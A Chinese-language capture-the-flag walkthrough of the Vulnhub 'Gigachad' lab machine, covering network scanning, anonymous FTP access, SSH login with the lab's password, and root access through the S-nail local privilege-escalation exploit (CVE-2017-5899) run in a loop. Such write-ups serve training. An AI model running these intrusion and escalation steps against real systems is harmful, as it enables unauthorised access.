Vulnhub之Gigachad靶机解题过程
Gigachad
靶机基本信息
名称:Gigachad 1
地址:https://www.vulnhub.com/entry/gigachad-1,657/
识别目标IP地址
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:04:6e:1f 1 60 PCS Systemtechnik GmbH
192.168.56.205 08:00:27:b3:77:05 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.205
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 20:30 EST
Nmap scan report for bogon (192.168.56.205)
Host is up (0.00016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/kingchad.html
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B3:77:05 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)以及80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ ftp 192.168.56.205
Connected to 192.168.56.205.
220 (vsFTPd 3.0.3)
Name (192.168.56.205:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||37667|)
150 Here comes the directory listing.
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||39196|)
150 Here comes the directory listing.
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 .
dr-xr-xr-x 2 1000 1000 4096 Feb 07 2021 ..
-r-xr-xr-x 1 1000 1000 297 Feb 07 2021 chadinfo
226 Directory send OK.
ftp> gte chadinfo
?Invalid command.
ftp> get chadinfo
local: chadinfo remote: chadinfo
229 Entering Extended Passive Mode (|||7821|)
150 Opening BINARY mode data connection for chadinfo (297 bytes).
100% |********************************| 297 596.78 KiB/s 00:00 ETA
226 Transfer complete.
297 bytes received in 00:00 (310.20 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ ls
chadinfo nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ cat chadinfo
PK
0
HR��▒ƃchadinfoUT �j `Zj `ux
why yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png
PK
0
HR��▒ƃ▒��chadinfoUT�j `ux
PKN�
将chadinfo文件下载到Kali Linux本地,打开查看告知:用户名是chad, 密码需要访问/drippinchad.png,用百度图片识别搜索,应该是MAIDEN‘S Tower
尝试登录chad用户,密码是maidenstower
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ ssh chad@192.168.56.205
chad@192.168.56.205's password:
Linux gigachad 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chad@gigachad:~$ id
uid=1000(chad) gid=1000(chad) groups=1000(chad)
chad@gigachad:~$ sudo -l
-bash: sudo: command not found
chad@gigachad:~$ ls -alh
total 20K
drwxr-xr-x 4 chad chad 4.0K Nov 21 20:48 .
drwxr-xr-x 3 root root 4.0K Feb 7 2021 ..
dr-xr-xr-x 2 chad chad 4.0K Feb 7 2021 ftp
drwx------ 3 chad chad 4.0K Nov 21 20:48 .gnupg
-r-x------ 1 chad chad 1.8K Jan 3 2021 user.txt
chad@gigachad:~$ cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
chad@gigachad:~$
拿到了用户flag.
提权
chad@gigachad:~/.gnupg$ ls -alh /usr/lib/s-nail/s-nail-privsep
-rwsr-xr-x 1 root root 9.9K Jan 1 2016 /usr/lib/s-nail/s-nail-privsep
chad@gigachad:~/.gnupg$
这个先看一下有没有漏洞利用代码:
──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ searchsploit s-nail
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
S-nail < 14.8.16 - Local Privilege Escalation | multiple/local/47172.sh
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ searchsploit -m multiple/local/47172.sh
Exploit: S-nail < 14.8.16 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/47172
Path: /usr/share/exploitdb/exploits/multiple/local/47172.sh
File Type: POSIX shell script, ASCII text executable
Copied to: /home/kali/Vulnhub/Gigachad/47172.sh
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ ls
47172.sh bg2.jpg chadinfo drippinchad.png hydra.restore nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Gigachad]
└─$ cat 47172.sh
#!/bin/sh
# Wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899
# uses ld.so.preload technique
# ---
# [~] Found privsep: /usr/lib/s-nail/s-nail-privsep
将代码上传到目标主机的/tmp目录下,修改权限,然后执行:
这个漏洞是个竞争性漏洞,需要放在一个while 循环里不断执行才能拿到root shell
while true;do;./47172.sh;done;
# cd /root
# ls -alh
total 428K
drwx------ 2 root root 4.0K Feb 10 2021 .
drwxr-xr-x 17 root root 4.0K Feb 7 2021 ..
-rw------- 1 root root 46 Feb 10 2021 .bash_history
-r-x------ 1 root root 411K Feb 7 2021 chad_real_identity.png
-r-x------ 1 root root 1.8K Dec 17 2020 root.txt
# cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█
congratulations!
#
STRIVE FOR PROGRESS,NOT FOR PERFECTION
